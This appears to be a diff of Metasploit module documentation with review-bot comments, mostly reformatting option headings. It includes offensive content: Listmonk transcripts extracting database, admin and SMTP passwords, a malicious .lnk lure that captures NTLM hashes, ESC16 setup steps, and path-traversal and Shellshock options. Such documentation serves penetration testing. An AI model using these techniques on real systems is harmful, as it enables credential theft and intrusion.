[*] Listening for hashes on 192.168.1.25:445
[*] Auxiliary module execution completed
```
Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive).
When the victim opens the containing folder in Explorer, an SMB connection is attempted:
```
[*] SMB Captured - 2025-09-18 21:03:00 +0530
NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:examplehashvalue
NT_CLIENT_CHALLENGE:examplechallenge
```
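Review bot: The Options section documents only APPNAME, while verification step 3 names FILENAME, step 6 names UNCPATH, and the scenario sets SRVHOST; each needs its own `###` entry, and the UNCPATH entry should state that setting it disables the automatic SMB capture server described in step 6.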
@@ -28,12 +28,12 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess
## Options
**WEBACCESSUSER**
### WEBACCESSUSER
The username to use to log into Advantech WebAccess. By default, there is a built-in account
```admin``` that you could use.
**WEBACCESSPASS**
### WEBACCESSPASS
The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
does not have a password, which could be something you can use.
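Review bot: Both option descriptions use triple backticks for inline code (```` ```admin``` ````); use single backticks. The product name is spelled `Advantech` in the first entry and `AdvanTech` in the second.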
@@ -23,11 +23,11 @@ This will start a webserver running on port 9222 for all network interfaces.
## Options
**FILEPATH**
### FILEPATH
The file path on the remote you wish to retrieve.
**URL**
### URL
A URL you wish to fetch the contents of from the remote machine.
@@ -19,15 +19,15 @@ List the steps needed to make sure this thing works
## Options
**RHOSTS**
### RHOSTS
Set the target host.
**RPORT**
### RPORT
Set the target port. The default value is `8080` which is the default value used by Tapestry server.
**TARGETED_CLASS**
### TARGETED_CLASS
This is not a required option and by default the value is `AppModule.class` which is also the default java class of by Tapestry server where the hmac key is set. But in case you want to target a different java class, it can be done by setting this option with another class name.
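Review bot: The context line `List the steps needed to make sure this thing works` is the unfilled placeholder from the module documentation template and should be replaced with the actual verification steps. Under `### TARGETED_CLASS`, "the default java class of by Tapestry server" has a stray "of", and "hmac" should be "HMAC".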
@@ -10,15 +10,15 @@ This module downloads PDF files and extracts the author's name from the document
## Options
**URL**
### URL
The URL of a PDF to analyse.
**URL_LIST**
### URL_LIST
File containing a list of PDF URLs to analyze.
**OUTFILE**
### OUTFILE
File to store extracted author names.
@@ -8,23 +8,23 @@ BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11
## Options
**SHOW_MASTHEAD**
### SHOW_MASTHEAD
Default: true. Read Organization name from `/masthead/masthead.axfm`
**SHOW_PACKAGES**
### SHOW_PACKAGES
Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`
**SHOW_SITES**
### SHOW_SITES
Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`
**DOWNLOAD**
### DOWNLOAD
Default true. Attempt to download identified packages.
**ShowURL**
### ShowURL
Default false. Show full URL for the packages instead of the filename.
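Review bot: The five entries write the default inconsistently (`Default: true.` for SHOW_MASTHEAD, `Default true.` for the rest); use one form, and "packages names" under `### SHOW_PACKAGES` should be "package names".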
@@ -73,7 +73,7 @@ creds -v
The `kerberos_enumusers` module only requires the `RHOST`, `DOMAIN` and
`USER_FILE` options to run.
**The DOMAIN option**
### The DOMAIN option
This option is used to specify the target domain. If the domain name is
incorrect an error is returned and domain user account enumeration will fail.
@@ -84,7 +84,7 @@ An example of setting DOMAIN:
set DOMAIN [domain name]
```
**The USER_FILE option**
### The USER_FILE option
This option is used to specify the file containing a list of user names
to query the Domain Controller to identify if they exist in the target domain
@@ -96,7 +96,7 @@ An example of setting USER_FILE:
set USER_FILE [path to file]
```
**The Timeout option**
### The Timeout option
This option is used to specify the TCP timeout i.e. the time to wait
before a connection to the Domain Controller is established and data read.
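Review bot: The `### The Timeout option` sentence is muddled: a TCP timeout is the time to wait *for* the connection to be established and data to be read, not "before". Also write "i.e.," with the comma, and consider matching the other module docs, which head option sections with the bare option name (`### Timeout`) rather than "The ... option".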
@@ -222,25 +222,24 @@ In order to create a template vulnerable to ESC16 scenario 1, follow the first 1
which is all the steps up to and excluding the `msPKI-Enrollment-Flag", 0x80000` powershell step which is how you set the `CT_FLAG_NO_SECURITY_EXTENSION`.
Ensure that `StrongCertificateBindingEnforcement` is set to `0` or `1` (not `2`) by running the following command listed in `Configuring Windows to be Vulnerable to ESC9`
### ESC16 Scenario 2
#### ESC16 Scenario 2
When a CA has the OID `1.3.6.1.4.1.311.25.2` added to its `policy\DisableExtensionList` and `StrongCertificateBindingEnforcement` is set to `2`, there is still a way to exploit the template.
If the policy module's `EditFlags` has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set (which is essentially ESC6), then the template is vulnerable to ESC16 scenario 2.
Ensure the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is set by running following PowerShell command:
```powershell
$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
$activePolicyName = (Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\*\PolicyModules" -Name "Active").Active
$editFlagsPath = "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\*\PolicyModules\$activePolicyName"
$editFlags = (Get-ItemProperty -Path $editFlagsPath -Name "EditFlags").EditFlags
certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
```
if ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) {
Write-Output "The EDITF_ATTRIBUTESUBJECTALTNAME2 flag is already enabled."
} else {
# Enable the flag by setting it in the EditFlags value
$newEditFlags = $editFlags -bor $EDITF_ATTRIBUTESUBJECTALTNAME2
Set-ItemProperty -Path $editFlagsPath -Name "EditFlags" -Value $newEditFlags
Write-Output "The EDITF_ATTRIBUTESUBJECTALTNAME2 flag has been enabled."
}
Then restart the Certificate Services service:
```powershell
net stop certsvc
net start certsvc
```
Then vefify the flag is set by running:
```powershell
certutil -getreg policy\EditFlags
```
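Review bot: The closing fence right after the `$editFlags = (Get-ItemProperty ...)` line comes before the `if ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) { ... }` block, so as shown the if/else lands outside the ```powershell fence; the fence should close after the final `}`. Replacing the one-line `certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2` with a read-modify-write through `Set-ItemProperty` also deserves a sentence explaining why (the certutil form is the documented way to set this flag); if the intent is only to avoid re-setting an already-set flag, say so. Minor: "Then vefify the flag is set" should be "verify", and `` `msPKI-Enrollment-Flag", 0x80000` `` in the first context line carries a stray double quote.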
## Module usage
@@ -0,0 +1,178 @@
## Vulnerable Application
This module exploits insecure Sprig template functions in Listmonk versions >= v4.0.0 and < v5.0.2.
The `env` and `expandenv` functions are enabled by default in campaign templates, allowing
authenticated users with minimal campaign permissions to extract sensitive environment variables
through the campaign preview functionality.
Listmonk is a self-hosted newsletter and mailing list manager. Environment variables in
Listmonk deployments often contain sensitive information such as database credentials,
SMTP passwords, API keys, and admin credentials.
### Required Privileges
For this exploit to work, the authenticated user must have the following privileges:
- `campaigns:get` - Permission to get and view campaigns belonging to permitted lists
- `campaigns:get_all` - Permission to get and view campaigns across all lists
These are minimal privileges that can be assigned to non-admin users in multi-user Listmonk
installations, making this vulnerability particularly dangerous as it allows privilege escalation
through environment variable disclosure.
#### Docker Installation (Vulnerable Version)
To install the vulnerable version, run the following command :
```
curl -LO https://github.com/knadh/listmonk/raw/master/docker-compose.yml
sed -i 's|image: listmonk/listmonk:latest|image: listmonk/listmonk:v5.0.1|' docker-compose.yml
docker compose up
```
#### Vulnerable Versions
- Listmonk >= v4.0.0 and < v5.0.2
#### Patched Versions
- Listmonk >= v5.0.2
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/gather/listmonk_env_disclosure`
3. Do: `set RHOSTS [target]`
4. Do: `set USERNAME [username]`
5. Do: `set PASSWORD [password]`
6. Optional: `set ENVVAR [comma-separated environment variables]`
7. Do: `run`
8. You should see extracted environment variable values
## Options
### USERNAME
The Listmonk username for authentication. This must be a valid user account with
the required `campaigns:get` and `campaigns:get_all` permissions.
### PASSWORD
The Listmonk password for authentication.
### ENVVAR
A comma-separated list of environment variable names to extract. If not specified,
the module will automatically attempt to extract a default list of common sensitive
environment variables.
**Default variables extracted (when ENVVAR is not set):**
- `LISTMONK_db__host` - Database host
- `LISTMONK_db__port` - Database port
- `LISTMONK_db__user` - Database username
- `LISTMONK_db__password` - Database password
- `LISTMONK_db__database` - Database name
- `LISTMONK_app__address` - Application address
**Examples of custom variables to target:**
- `LISTMONK_app__admin_username`, `LISTMONK_app__admin_password` - Admin credentials
- `SMTP_HOST`, `SMTP_PORT`, `SMTP_USER`, `SMTP_PASSWORD` - Email server credentials
- `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` - Cloud provider credentials
- `DATABASE_URL`, `REDIS_URL` - Connection strings
- `SECRET_KEY`, `API_KEY` - Application secrets
- `PATH`, `HOME`, `USER` - System environment variables
### CAMPAIGN_NAME
Optional campaign name to use for the temporary campaign created during extraction.
If not specified, a random name will be generated to avoid collisions when running
the module multiple times. The campaign is automatically deleted after extraction.
## Scenarios
### Running Check to Verify Target is Vulnerable
```
msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
PASSWORD => adminadmin
msf6 auxiliary(gather/listmonk_env_disclosure) > check
[*] 192.168.1.100:9000 - The target appears to be vulnerable. Listmonk version 5.0.1 is vulnerable
```
### Extract Default Environment Variables
Running the module without specifying ENVVAR will automatically extract the default
list of common Listmonk environment variables:
```
msf6 > use auxiliary/gather/listmonk_env_disclosure
msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
PASSWORD => adminadmin
msf6 auxiliary(gather/listmonk_env_disclosure) > run
[*] Running module against 127.0.0.1
[*] Targeting http://127.0.0.1:9000/
[+] Login successful
[*] Using default environment variable list (6 variables)
[*] Executing template to extract environment variables...
[+] Environment variable(s) extracted:
LISTMONK_db__host: localhost
LISTMONK_db__port: 5432
LISTMONK_db__user: listmonk_user
LISTMONK_db__password: my_secure_db_password123
LISTMONK_db__database: listmonk
LISTMONK_app__address: 0.0.0.0:9000
[*] Auxiliary module execution completed
```
### Extract Specific Environment Variables
You can target specific environment variables by providing a comma-separated list:
```
msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
ENVVAR => LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
msf6 auxiliary(gather/listmonk_env_disclosure) > run
[*] Running module against 127.0.0.1
[*] Targeting http://127.0.0.1:9000/
[+] Login successful
[*] Targeting specific environment variables: LISTMONK_db__password, LISTMONK_app__admin_password, SMTP_PASSWORD
[*] Executing template to extract environment variables...
[+] Environment variable(s) extracted:
LISTMONK_db__password: my_secure_db_password123
LISTMONK_app__admin_password: admin_secret_password
SMTP_PASSWORD: smtp_pass_2024
[*] Auxiliary module execution completed
```
### Extract Single Environment Variable
```
msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR PATH
ENVVAR => PATH
msf6 auxiliary(gather/listmonk_env_disclosure) > run
[*] Running module against 127.0.0.1
[*] Targeting http://127.0.0.1:9000/
[+] Login successful
[*] Targeting specific environment variables: PATH
[*] Executing template to extract environment variables...
[+] Environment variable(s) extracted:
PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Auxiliary module execution completed
```
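Review bot: `### Required Privileges` lists only `campaigns:get` and `campaigns:get_all`, but `### CAMPAIGN_NAME` says the module creates a temporary campaign and deletes it after extraction, which those read permissions would not cover; verify the list against the API calls the module actually makes and document the create/delete permission if it is needed. `#### Docker Installation (Vulnerable Version)`, `#### Vulnerable Versions` and `#### Patched Versions` are nested under `### Required Privileges` where they do not belong; make them `###` sections. Minor: "run the following command :" has a space before the colon.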
@@ -33,16 +33,16 @@ resolvable.
## Options
**PROTOCOL**
### PROTOCOL
Set this to either TCP or UDP. UDP is the default due to `bootparamd`.
**CLIENT**
### CLIENT
Set this to the address of a client in the target's `bootparams` file.
Usually this is a host within the same network range as the target.
**XDRTimeout**
### XDRTimeout
Set this to the timeout in seconds for XDR decoding of the response.
@@ -24,21 +24,21 @@ If the link is down, you can find it via the Wayback Machine.
## Options
**PROTOCOL**
### PROTOCOL
Set this to either TCP or UDP. TCP is the default due to easy discovery.
**DOMAIN**
### DOMAIN
Set this to your NIS domain.
**MAP**
### MAP
Set this to the NIS map you want to dump. The default is `passwd`. You
can use the nicknames described in the module info instead of the full
map names.
**XDRTimeout**
### XDRTimeout
Set this to the timeout in seconds for XDR decoding of the response.
@@ -28,17 +28,39 @@ Office365's implementation of ActiveSync is vulnerable.
## Options
LOGFILE = Output file to use for verbose logging.
OUTPUT = Output file for results.
PASSWORD = Password to use during enumeration. Note this must exist
but does not necessarily need to be valid. If it is
found to be valid for an account it will be reported.
THREADS = Number of concurrent requests to use during enumeration.
TIMEOUT = HTTP request timeout to use during enumeration.
URL = URL of Office365 ActiveSync service.
USERS = Input fie containing candidate usernames, one per line.
VERBOSE = Enable/Disable DEBUG logging
### LOGFILE
Output file to use for verbose logging.
### OUTPUT
Output file for results.
### PASSWORD
Password to use during enumeration. Note this must exist
but does not necessarily need to be valid. If it is
found to be valid for an account it will be reported.
### THREADS
Number of concurrent requests to use during enumeration.
### TIMEOUT
HTTP request timeout to use during enumeration.
### URL
URL of Office365 ActiveSync service.
### USERS
Input fie containing candidate usernames, one per line.
### VERBOSE
Enable/Disable DEBUG logging
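Review bot: `Input fie containing candidate usernames` under `### USERS` carries the typo over from the removed line; it should be "Input file". `Enable/Disable DEBUG logging` is the only entry without a closing period.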
## Scenarios
@@ -39,7 +39,7 @@ wvu@kharak:~$
## Options
**APIKEY**
### APIKEY
Valid API key for accessing Pimcore's REST API in order to perform the injection.
@@ -26,12 +26,12 @@ Manual Dump an arbitrary file (FILE option)
## Options
**FILE**
### FILE
Set this to the file you want to dump. The default is `/etc/passwd`.
Valid only in manual mode.
**PRINT**
### PRINT
Whether to print file contents to the screen. Valid only in manual mode.
@@ -8,22 +8,22 @@ may need to tweak them for your target.
## Options
**OFFSET_START**
### OFFSET_START
You want to set this to a value where you can see a backtrace. Set this
lower if you're not sure. Default is 2000.
**OFFSET_END**
### OFFSET_END
Set this option to a value where you don't see a backtrace. Set this
higher if you're not sure. Default is 5000.
**RETRIES**
### RETRIES
Sometimes the attack won't be successful on the first run. This option
controls how many times to retry the attack. Default is 10.
**VERBOSE**
### VERBOSE
This will tell you how long the binary search took and how many requests
were sent during exploitation. Default is false.
@@ -18,11 +18,11 @@
## Options
**ROUTE**
### ROUTE
This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file.
**TARGET_FILE**
### TARGET_FILE
This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).
@@ -16,11 +16,11 @@ In order for this module to function properly, a Shodan API key is needed. You c
## Options
**TARGET**
### TARGET
The remote host to request the API to scan.
**SHODAN_APIKEY**
### SHODAN_APIKEY
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
@@ -15,15 +15,15 @@ In order for this module to function properly, a Shodan API key is needed. You c
## Options
**RHOSTS**
### RHOSTS
The target machine(s) whose port information will be obtained from Shodan
**SHODAN_APIKEY**
### SHODAN_APIKEY
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
**Proxies**
### Proxies
A proxy chain of format type:host:port[,type:host:port][...] that will be used to establish the connection to the Shodan servers.
@@ -27,23 +27,23 @@
## Options
**HttpUsername**
### HttpUsername
The username for Snare remote access (default: `snare`).
**HttpPassword**
### HttpPassword
The password for Snare remote access (default: blank).
**REG_DUMP_KEY**
### REG_DUMP_KEY
Retrieve the specified registry key and all sub-keys.
**REG_DUMP_ALL**
### REG_DUMP_ALL
Retrieve the entire Windows registry.
**TIMEOUT**
### TIMEOUT
Timeout in seconds for downloading each registry key/hive.
@@ -19,7 +19,7 @@ Microsoft Windows
## Options
**FILENAME**
### FILENAME
This option allows you to customise the generated filename and filetpye that is generated.
To generate desktop.ini configure a filename of desktop.ini
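Review bot: "filename and filetpye that is generated" under `### FILENAME` should be "filename and filetype", and "customise the generated filename ... that is generated" repeats itself; "customise the generated filename and, by extension, the file type" says it once.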
@@ -29,7 +29,7 @@ To generate a lnk file configure a filename of anyname.lnk
Filetype generation is based on the file extension.
**LHOST**
### LHOST
This option allows you to set the IP address of the SMB Listener that the document points to
This can be changed using set LHOST 192.168.1.25
@@ -96,4 +96,4 @@ msf auxiliary(multidrop) > exploit
[] Auxiliary module execution completed
msf auxiliary(multidrop) > back
```
```
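Review bot: The transcript line `[] Auxiliary module execution completed` has lost the asterisk that msfconsole prints; inside a code fence it can be written as `[*]` without escaping.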
@@ -20,11 +20,11 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https
## Options
**SERVERINFO**
### SERVERINFO
If set to `true`, the server info will also enumerated and set in msf's DB. Defaults to `false`.
**CREATEUSER**
### CREATEUSER
If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.
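Review bot: `### CREATEUSER` says "the server info will attempt to create an account", a copy-paste from the SERVERINFO entry; it should read "the module will attempt to create an account". In `### SERVERINFO`, "will also enumerated" is missing "be".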
@@ -21,27 +21,13 @@ It has been tested with Windows servers 2012, 2016, 2019 and 2022
### USER_FILE
**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
Example: `set USER_FILE /path/to/usernames.txt`
**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
### RPORT
**Example:** `set USER_FILE /path/to/usernames.txt`
2- `RHOSTS` (required)
**Description:** The target IP address or range of IP addresses of the Domain Controllers.
**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
**Example:** `set RHOSTS 192.168.1.100`
3- `RPORT` (optional)
**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
**Example:** `set RPORT 49664`
Optional. The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
## Scenarios
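Review bot: the rewrite from the numbered `1-/2-/3-` list to `###` headings appears to drop content rather than only restructure it. The `RHOSTS` entry (description, usage and the `set RHOSTS 192.168.1.100` example) has no heading on the new side, and `### RPORT` keeps the two description sentences but not the `set RPORT 49664` example. Dropping RHOSTS may be intentional since it is a standard option, but the RPORT example is worth keeping because the port is otherwise auto-discovered and a reader may not know what a typical value looks like; suggest adding `Example: \`set RPORT 49664\`` under the new heading.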
@@ -18,7 +18,7 @@ The following was done on Kali linux:
## Options
**USERS_FILE**
### USERS_FILE
The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.
@@ -19,15 +19,15 @@ When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your
## Options
**FTPUSER**
### FTPUSER
Default user for Colorado FTP is `ftpuser`
**FTPPASS**
### FTPPASS
Default password for Colorado FTP is `ftpuser123`
**DEPTH**
### DEPTH
Default depth of ../ to do is 2 to get back to the root of Colorado FTP. This can run anywhere, so you may have to play a bit to find the root.
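Review bot: the DEPTH description is hard to parse: "Default depth of ../ to do is 2" has the traversal sequence inline without code formatting and "to do" is vague about what is being counted. Suggest `The number of \`../\` segments to prepend; defaults to 2, which reaches the Colorado FTP root in a default install. The server can be installed anywhere, so you may need to adjust this.`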
@@ -14,11 +14,11 @@ http://www.efssoft.com/efsfs.exe
Since the FTP server allows anonymous access, by default, you only need to configure:
**RHOSTS**
### RHOSTS
The FTP server IP address.
**PATH**
### PATH
The file you wish to download. Assume this path starts from C:\
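Review bot: the PATH line ends in a bare backslash (`Assume this path starts from C:\`). In Markdown a trailing backslash is treated as an escape or hard line break and may not render as the drive letter the author intended; wrap it in backticks (`` `C:\` ``) so it displays literally.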
@@ -101,7 +101,7 @@ The following table contains the file types associated with the characters:
## Options
**PATH**
### PATH
It is possible to view content within a directory of the gophermap. If the initial run shows directory `Directory: foobar`,
setting **path** to `/foobar` will enumerate the contents of that folder. Default: [empty string].
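Review bot: the body refers to the option as `**path**` in bold lowercase while the new heading reads `### PATH`; use the exact option name in code formatting (`setting \`PATH\` to \`/foobar\``) so it matches what the user types into `set`. `Default: [empty string]` could likewise follow the convention used elsewhere in this change (see the cgit REPO doc: `` Default is empty, `''` ``).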
@@ -6,7 +6,7 @@ Open-source GGSN implementations can be used as a target for this module as well
## Options
**The RPORT option**
### The RPORT option
This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.
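Review bot: the new heading `### The RPORT option` is inconsistent with every other heading in this change, which is just the option name (`### RPORT`, `### DEPTH`, ...). Suggest `### RPORT` so the module docs are uniform and the option name is easy to grep for.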
@@ -73,20 +73,20 @@ To setup an Environment that the scanner can be run against, follow the below st
## Options
**CMD**
### CMD
This is the command that will be run by the scanner. The default setting is `/usr/bin/id`.
**CVE**
### CVE
This is the CVE that will be used to exploit the vulnerability.
The default setting is `CVE-2014-6271` but valid options are `CVE-2014-6271` or `CVE-2014-6278`.
**HEADER**
### HEADER
This is the user agent string that is sent when the module is run. The default setting is `User-Agent`.
**METHOD**
### METHOD
This is HTTP method used by the module. The default setting is `GET`.
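Review bot: the HEADER description is misleading: it says the option is "the user agent string that is sent", but its default value `User-Agent` is an HTTP header name rather than a UA string, so the option evidently selects which request header carries the command. Suggest `The HTTP header in which the command is sent. The default setting is \`User-Agent\`.` Also, `This is HTTP method used by the module` is missing "the".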
@@ -70,19 +70,19 @@ docker start CVE-2021-42013
## Options
**CVE**
### CVE
The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013). Default: CVE-2021-42013
**DEPTH**
### DEPTH
Depth for path traversal. Default: 5
**FILEPATH**
### FILEPATH
The file you want to read. Default: `/etc/passwd`
**TARGETURI**
### TARGETURI
Base path. Default: `/cgi-bin`
@@ -23,6 +23,6 @@ http://goo.gl/pHAqS1
## Options
**TRYDEFAULT**
### TRYDEFAULT
The ```TRYDEFAULT``` options adds the default credential admin:123456 to the credential list.
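Review bot: the TRYDEFAULT line wraps the option name in three backticks instead of one, which some Markdown renderers treat as an opened-and-closed code fence rather than inline code; use single backticks (`TRYDEFAULT`). In the same sentence "options adds" should be "option adds", and `admin:123456` would read better in code formatting.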
@@ -52,7 +52,7 @@ ctx.qry.path can come from querystring_cb(), which takes unescaped data from the
## Options
**REPO**
### REPO
Git repository on the remote server. Default is empty, `''`.
@@ -16,11 +16,11 @@
## Options
**HttpUsername**
### HttpUsername
Username to use for basic authentication. Default value is `cisco`
**HttpPassword**
### HttpPassword
Password to use for basic authentication. Default value is `cisco`
@@ -10,19 +10,19 @@ You can use any web application to test the crawler.
## Options
**URI**
### URI
Default path is `/`
**DirBust**
### DirBust
Bruteforce common url path, default is `true` but may generate noise in reports.
**HttpPassword**, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
### HttpPassword, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
You can add some login information
**UserAgent**
### UserAgent
Default User Agent is `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`
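Review bot: the combined heading `### HttpPassword, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**` keeps the bold markers on three of the four names, so they render with mixed emphasis inside a heading; drop the `**` from all of them. The body line `You can add some login information` is also too thin for four options: a short phrase per option saying what each one carries would help.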
@@ -4,7 +4,7 @@ This module scans for Docker servers listening on a TCP port (default 2375).
## Options
**VERBOSE**
### VERBOSE
Enable this to dump all info to the screen.

Some files were not shown because too many files have changed in this diff.